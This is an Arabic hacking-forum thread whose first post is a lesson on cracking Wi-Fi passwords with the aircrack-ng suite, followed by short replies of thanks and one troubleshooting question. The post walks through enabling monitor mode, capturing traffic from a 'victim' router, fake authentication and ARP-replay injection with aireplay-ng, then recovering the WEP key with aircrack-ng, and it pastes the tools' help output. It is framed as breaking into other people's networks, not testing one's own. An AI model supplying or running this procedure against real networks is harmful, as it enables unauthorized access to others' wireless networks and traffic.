اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الدرس الثاني ... الحرب الاكترونية

الدرس الثاني ... الحرب الاكترونية


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 17

الموضوع: الدرس الثاني ... الحرب الاكترونية

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Apr 2013
    الدولة
    العراق
    المشاركات
    45

    aljyyosh الدرس الثاني ... الحرب الاكترونية



    بسم الله و السلام عليكم ورحمة الله

    جميع الحقوق محفوظة

    لا نقبل اي نسخ دون ذكر الكاتب مع المصدر (جيوش الهكر)

    اليوم نشرج فقط aircrack-ng

    و تنقسم هذه الاداة الى :

    Aircrack-ng suite



    airbase-ng -- Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.


    aircrack-ng -- 802.11 WEP and WPA/WPA2-PSK key cracking program.


    airdecap-ng -- Decrypt WEP/WPA/WPA2 capture files.


    airdecloak-ng -- Remove WEP Cloaking™ from a packet capture file.


    airdriver-ng -- Script providing information and allowing installation of wireless drivers.


    airdrop-ng -- A rule based wireless deauthication tool.


    aireplay-ng -- Inject and replay wireless frames.


    airgraph-ng -- Graph wireless networks.


    airmon-ng -- Enable and disable monitor mode on wireless interfaces.


    airodump-ng -- Capture raw 802.11 frames.


    airolib-ng -- Precompute WPA/WPA2 passphrases in a database to use it later with aircrack-ng.


    airserv-ng -- Wireless card TCP/IP server which allows multiple application to use a wireless card.


    airtun-ng -- Virtual tunnel interface creator.


    easside-ng -- Auto-magic tool which allows you to communicate to an WEP-encrypted Access Point without knowing the key.


    packetforge-ng -- Create various type of encrypted packets that can be used for injection.


    tkiptun-ng -- Proof-of-concept implementation the WPA/TKIP attack: inject a few frames into a WPA TKIP network with QoS


    wesside-ng -- Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.


    Other tools - WZCook and ivstools


    و هذه دورة باللغة الاجنبية انصحكم بها

    http://www.youtube.com/channel/UCs X...oK Ag/v ideo s


    طبعا هذا لا يعني اني لن اشرح الادوات ... لا لا راح اشرحها بس مو كلها بس المهم

    اهم اداة من ادوات ايركراك هي :

    airmon-ng
    airodump-ng
    aireplay-ng
    airdrop-ng
    aircrack-ng

    اول اداة ... هذي الاداة من اهم الادوات و لو من دونها لايمكن عمل اي شي

    هذه الاداة لو كتبت في ال"الطرفية"(terminal) و تكتب "airmon-ng" راح تلاحظ يكتبلك كروت الوايرليس الموجودة عندك



    الدرس الثالث الحرب الاكترونية
    الان تلاحظ وجود wlan0 و هذه كارت الوايرليس تبعي لو مكانش موجود اي كارت واير ليس هذا لازم تدخل عل درس حل مشكلة الواير ليس و انشاء الله في الدرس القادم

    والان حتى نبدي نخترق الوايرليس لازم نعرف انو الكرت الشبكة كبيرة و راح نعملها فرع

    تسالون كيف اقولكم راح نكتب بالترمنال "الطرفية"

    airmon-ng start wlan0

    راح تلاحظ الصورة التالية



    احنة الي يهمنا اخر سطر و الي هو "monitor mode enabled on mon0"

    تمام الان ننسى wlan0 راح يكون كل شغلنا عل mon0

    الان عملنا شبكة فرعية لسهولة العمل

    خلص شغلنا عل airmon-ng

    نجي عل airodump-ng

    هذه الاداة وضيفتها اختراق الاشبكات + عرض الشبكات الموجودة حولك مع كل المعلومات

    الان شوية ندرس الاداة لانها مهمة جدا

    نكتب في ترمنال"الطرفية" airodump-ng

    ________________________________________

    Airodump-ng 1.1 - (C) 2006-2010 Thomas d'Otreppe
    Original work: Christophe Devine
    Aircrack-ng

    usage: airodump-ng <options> <interface>[,<interface>,...]

    Options:
    --ivs : Save only captured IVs
    --gpsd : Use GPSd
    --write <prefix> : Dump file prefix
    -w : same as --write
    --beacons : Record all beacons in dump file
    --update <secs> : Display update delay in seconds
    --showack : Prints ack/cts/rts statistics
    -h : Hides known stations for --showack
    -f <msecs> : Time in ms between hopping channels
    --berlin <secs> : Time before removing the AP/client
    from the screen when no more packets
    are received (Default: 120 seconds)
    -r <file> : Read packets from that file
    -x <msecs> : Active Scanning Simulation
    --output-format
    <formats> : Output format. Possible values:
    pcap, ivs, csv, gps, kismet, netxml

    Filter options:
    --encrypt <suite> : Filter APs by cipher suite
    --netmask <netmask> : Filter APs by mask
    --bssid <bssid> : Filter APs by BSSID
    -a : Filter unassociated clients

    By default, airodump-ng hop on 2.4GHz channels.
    You can make it capture on other/specific channel(s) by using:
    --channel <channels>: Capture on specific channels
    --band <abg> : Band on which airodump-ng should hop
    -C <frequencies> : Uses these frequencies in MHz to hop
    --cswitch <method> : Set channel switching method
    0 : FIFO (default)
    1 : Round Robin
    2 : Hop on last
    -s : same as --cswitch

    --help : Displays this usage screen

    No interface specified.

    ______________________________________________

    خخخخخخخخخ اكيد الكل ميفتهم .... هسة افهمكم المهم بس

    لو تكتب في ترمنال

    airodump-ng mon0

    راح يعرضلك الشبكات الموجودة حولك

    مثال :



    لون الاحمر هو اسماء الشبكات الموجودة حولك
    لون الاصفر نوع تشفير الباس
    لون الازرق هو ماك ادرس حق الراوتر
    لون اخضر هو بوكيت المرسلة والمستقبلة و الضائعة
    لان نشرح الوردي و الازرق الفاتح

    راح تشوفون مكتوب bssid و station

    الاماك ادرس الموجود في الازرق الفاتح هي راوتر

    و الماك ادرس المجودة في لون الوردي هي اجهزة موجودة عل هذا الراوتر مثلا انا ماك ادرس راوتري عليها جهاز واحد وهي جهازي

    المهم خلصنا من هذا نجي عل امر غيرها و هي لو كتبنا في ترمنال

    airodump-ng --channel [Victim channel] --write [NAME] --bssid [Victim BSSID] [your interface]

    الان هذه طريقة جلب باس لكنها تكون مشفرة

    تكتبون بدل هذه الكلمات حسب نوع الشبكة الي حولك

    نسيت اخبركم عن كيفية استغراج [Victim channel] و هي تكون بين لون اصفر و الازرق تكتب تحت CH

    و ثاني شي [NAME] نكتب هون اي سم تريد بس يكون ما فيها فراغات

    و ثالث شي [Victim BSSID] نكتب الماك ادرس حق الراوتر

    و رابع شي [your interface] نكتب اهنا mon0 نكتب النت الي عملناها فرعي و دائما تكون mon0

    مثال : airodump-ng --channel 11 --write shayar --bssid 11:22:33:44:55:66 mon0]

    الان نضغط انتر

    و نفتح ترمنال جديد

    و الان نروح عل اداة aireplay-ng و نكتبها في ترمنال اسم الاداة

    Aireplay-ng 1.1 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
    Original work: Christophe Devine
    Aircrack-ng

    usage: aireplay-ng <options> <replay interface>

    Filter options:

    -b bssid : MAC address, Access Point
    -d dmac : MAC address, Destination
    -s smac : MAC address, Source
    -m len : minimum packet length
    -n len : maximum packet length
    -u type : frame control, type field
    -v subt : frame control, subtype field
    -t tods : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep : frame control, WEP bit
    -D : disable AP detection

    Replay options:

    -x nbpps : number of packets per second
    -p fctrl : set frame control word (hex)
    -a bssid : set Access Point MAC address
    -c dmac : set Destination MAC address
    -h smac : set Source MAC address
    -g value : change ring buffer size (default: 8)
    -F : choose first matching packet

    Fakeauth attack options:

    -e essid : set target AP SSID
    -o npckts : number of packets per burst (0=auto, default: 1)
    -q sec : seconds between keep-alives
    -y prga : keystream for shared key auth
    -T n : exit after retry fake auth request n time

    Arp Replay attack options:

    -j : inject FromDS packets

    Fragmentation attack options:

    -k IP : set destination IP in fragments
    -l IP : set source IP in fragments

    Test attack options:

    -B : activates the bitrate test

    Source options:

    -i iface : capture packets from this interface
    -r file : extract packets from this pcap file

    Miscellaneous options:

    -R : disable /dev/rtc usage

    Attack modes (numbers can still be used):

    --deauth count : deauthenticate 1 or all stations (-0)
    --fakeauth delay : fake authentication with AP (-1)
    --interactive : interactive frame selection (-2)
    --arpreplay : standard ARP-request replay (-3)
    --chopchop : decrypt/chopchop WEP packet (-4)
    --fragment : generates valid keystream (-5)
    --caffe-latte : query a client for new IVs (-6)
    --cfrag : fragments against a client (-7)
    --test : tests injection and quality (-9)

    --help : Displays this usage screen

    No replay interface specified.

    طبعا الي يريد يدرس الاداة يقراها و احنة الي نريدها اختراق و راح ندرس الي بس نريدها


    aireplay-ng -1 0 -a [Victrim BSSID] [your interface]

    طبعا عارفين [Victrim BSSID] هي ماك ادرس حق الراوتر

    و [your interface] هي mon0

    الان نفتح ترمنال جديد

    و

    aireplay-ng -3 -b [Victim BSSID] [your interface]

    ما راح اعيد و هيك يكون خلصنا جزء الاول نجي للجزء الثاني

    و هي فك التشفير

    الان لو فتحت مجلد root راح تلقا فيها ملفات جديدة
    و الملفات مسمى عل الي كتبناه في [NAME]


    هذه ملفات مشفرة تحتوي عل الباس نروح الى اداة aircrack-ng

    و هذه الاداة يقوم بفك تشفير الباس او الملف بامدادات cap

    و نقوم بكتابة

    aircrack-ng -b [victrim bssid] [*.cap]

    راح تلاقي الاداة يكشف التشفير
    و راح يكتبلك



    key found

    و تلاحظ مكتوب الباس بين قوسين و انت شيل : و يصير الباس يعني مثلا انا طلعلي 11:33:44:88:sf:99

    يعني الباس حق الشبكة هي sf9911334488

    و خلص درسنا و الحمدالله

    اخوكم شايار

    للاستفسار : [email protected]

    جميع الحقوق محفوظة ...الدرس الثاني ... الحرب الاكترونية



  2. #2
    هكر متميز Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    1,060

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    ﻣﺸﻜﻮﺭ حبي ﺑﺲ ﻣﻌﻠﺶ ﺍﻋﻠﻘﻠﻚ ﻋﻠﻰ ﺷﻐﻠﺔ ﻟﻮ ﺗﻮﺿﻊ ﺻﻮﺭ ﻟﻠﺸﺮﺡ ﻭﺷﻮﻳﻪ ﺗﺮﺗﻴﺐ ﻳﻂﻠﻊ ﺷﺮﺡ ﻣﻤﻴﺰ ﻣﺸﻜﻮﺭ ﺟﺪﺍ


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Apr 2013
    الدولة
    العراق
    المشاركات
    45

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    والله اخي الصور ممكن متكون واضحة دئما و بعض الاحيان الصور ما نحتاجها مثلا لجملة و حدة ميريد اصور و احمل صور و اجيب الروابط يعني الشغل طويل بس في اشياء ما تفتهم بدون صور :\ و انشاء الله احط صور اكثر في الدروس الجاية



  4. #4
    هكر متميز Array الصورة الرمزية dark prince
    تاريخ التسجيل
    Jul 2010
    الدولة
    IN DARKNESS
    المشاركات
    1,608

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور للطرح اخي واصل


    رتب اكثر في المرة القادمة


  5. #5
    هكر نشيط Array الصورة الرمزية rayen
    تاريخ التسجيل
    Feb 2013
    الدولة
    tunisie
    المشاركات
    132

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور يا اخي جدا لكن شرح شوية مو مرتب


  6. #6
    هكر متألق Array الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    على الجايات طور المواضيع بارك الله فيك طرح حلو ومفيد



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    4

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    يسلمو الايادي


  8. #8
    محظور Array
    تاريخ التسجيل
    Nov 2012
    الدولة
    في قلبي أمي
    المشاركات
    1,135

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    بارك الله فيك


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2012
    الدولة
    بغداد
    المشاركات
    6

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    حبيبي اولا السلام عليكم بس اني يطلعلي(please specify a dictionaary)ارجو المساعدة
    ملاحظة:هاي الرسالة تطلعلي من اريد افك تشفير الملف



  10. #10
    هكر متميز Array الصورة الرمزية bachir66
    تاريخ التسجيل
    Jun 2010
    الدولة
    المغرب
    المشاركات
    1,000

    افتراضي رد: الدرس الثاني ... الحرب الاكترونية

    مشكور للطرح اخي واصل


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مقدمة ... الحرب الاكترونية
    بواسطة شايار في المنتدى قسم باك تراك BackTrack
    مشاركات: 6
    آخر مشاركة: 11-11-2013, 09:41 AM
  2. الدرس الاول ... الحرب الاكترونية
    بواسطة شايار في المنتدى قسم باك تراك BackTrack
    مشاركات: 15
    آخر مشاركة: 11-08-2013, 02:07 PM
  3. {الجزء الثاني} الدرس الثاني: شرح معظم أدوات الميتاسبلويت في الويندوز
    بواسطة aymen cyril kamar في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 21
    آخر مشاركة: 08-02-2013, 12:36 PM
  4. الدرس الثاني
    بواسطة MOSTAFA2000 في المنتدى لغات برمجة المواقع
    مشاركات: 5
    آخر مشاركة: 05-26-2012, 06:40 AM
  5. الدرس الثاني عشر في لغة php
    بواسطة Abdullhadi JC في المنتدى لغات برمجة المواقع
    مشاركات: 2
    آخر مشاركة: 05-15-2012, 05:44 PM

وجد الزوار هذه الصفحة بالبحث عن:

كسر تشفيير الويب wesside-ng

tkiptun-ng

http:www.aljyyosh.comvbshowthread.phpt=50107

airodump-ng no interface specified الحل

كسر شبكات الراوتر باستعمال برنامج terminal emulator

شرح اداة airdecap ng

سكربت لفك تشفير wesside-ng wep

شرح airdecap

airdecap-ng

شرح اداة airolib-ng

شرح tkiptun-ng

اختراق wpa2psk ببرنامجterminal emulatur

packetforge-ng شرح

شرح اداة tkiptun-ng

Terminal Ng- &amp;#1588;&amp;#1585;&amp;#1581;

airdecap-ng char7

طريقه انشاء datebase ل airolib

airdecap-ng شرح

كيف افك كود wpa2 hex

tkiptun-ng wpa attack

tkiptun-ng معلومات عن

لاختراق wpa بعد معرفةESSED و BASSED

airbase-ng شرح

wpa2 tkiptun

شرح ‏airbase-ng -p

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •